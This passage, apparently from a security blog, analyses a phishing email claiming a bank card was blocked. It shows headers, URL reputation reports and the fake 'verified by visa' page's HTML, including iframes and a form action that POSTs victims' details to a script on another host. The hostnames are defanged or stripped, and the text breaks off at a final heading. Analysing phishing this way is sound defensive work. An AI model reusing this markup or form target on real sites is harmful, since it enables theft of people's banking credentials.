Phishing: Urgent – Your bank card has been blocked

An user has reported us a suspicious email:



Received: from ( [])
Received: from www-data by with local (Exim 4.69)
Subject: URGENT - Your bank card has been blocked
From: Banking Service < >
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Sender: www-data <>

The clickable link “Access to your form” redirects to a new (suspicious) URL:

hxxp:// tf/


URLVoid report:

Report 2011-04-07 16:38:44 (GMT 1)
Domain Hash 91fa19172a89f4c10b8dc0ca8b0460ec
IP Address
IP Hostname
IP Country DE (Germany)
AS Number 24940
AS Name HETZNER-AS Hetzner Online AG RZ
Detections 2 / 22 (9 %)

Analyzing the URL content, we can see suspicious code:

<title>service verified by visa</title>
<link href="/zzz/css.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/zzz/gas.js"></script>
<script language="JavaScript" src="/zzz/init.php?D=c2VydmljZXZidi51cy50Zg%3D%3D&L=" type="text/javascript"></script>
<iframe src="hxxp://" frameborder="0" width="486px" height="60px" ></iframe>
<iframe src="hxxp://" name="fid1" id="fid1" width="100%" height="100%" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<a href="">service verified by visa</a>

Why suspicious ?

1) The page title looks like a scam
2) Why CSS style is located in the directory “/zzz/css.css” ?
3) Why Google Analytics (?) code is located in the directory “/zzz/gas.js” ?
4) Why there is an iframe related to adboost. com/index6.php ?
5) Why there is another iframe realted to (long URL) krystalweb. co. uk ?
6) Where is SSL ?

The long URL:

hxxp:// uk/suuport/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/update.php

Loads the fake form where an user should insert his details. The form will then send (POST) the details to another script that is located in another (suspicious) URL:

action="hxxp:// br/cgi-bin/CobreBemECommerceDados/HiTman2.php" method=post>

URLVoid analysis: